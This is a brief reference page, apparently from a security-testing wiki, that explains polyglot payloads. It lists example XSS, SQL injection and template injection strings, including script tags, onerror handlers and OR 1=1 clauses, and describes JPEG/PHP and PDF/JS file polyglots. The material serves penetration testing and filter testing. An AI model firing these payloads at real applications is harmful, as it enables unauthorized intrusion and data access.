Polyglot Payload

Polyglot Payload is a single payload that is valid in multiple contexts or formats, allowing it to trigger vulnerabilities regardless of how the application processes or renders the input.

Why Use Polyglots?

Unknown injection context
Application parses input multiple ways
Bypass context-specific filters
Testing efficiency - one payload, multiple vulnerabilities

XSS Polyglot Examples

# Works in multiple HTML contexts
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//

# Breaks out of various attribute contexts
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>

# Comprehensive polyglot
'";!--"<XSS>=&{()}

SQL Injection Polyglot

# Works with various string delimiters
'-"#*/

# Comprehensive SQLi polyglot
'/**/OR/**/1=1/**/--/**/

# DBMS-agnostic
' OR '1'='1' --
' OR '1'='1' /*

File Format Polyglots

# JPEG/PHP polyglot (GIFAR-style)
# Valid image that's also valid PHP when included

# PDF/JavaScript polyglot
# Valid PDF containing executable JS

Template Injection Polyglot

# Tests multiple template engines
${{<%[%'"}}%\
{{7*7}}${7*7}<%=7*7%>#{7*7}

Usage in Testing

Fuzzing unknown input fields
Automated scanning
Black-box testing efficiency
Bypass filter testing

Polyglot Payload

Why Use Polyglots?

XSS Polyglot Examples

SQL Injection Polyglot

File Format Polyglots

Template Injection Polyglot

Usage in Testing

See Also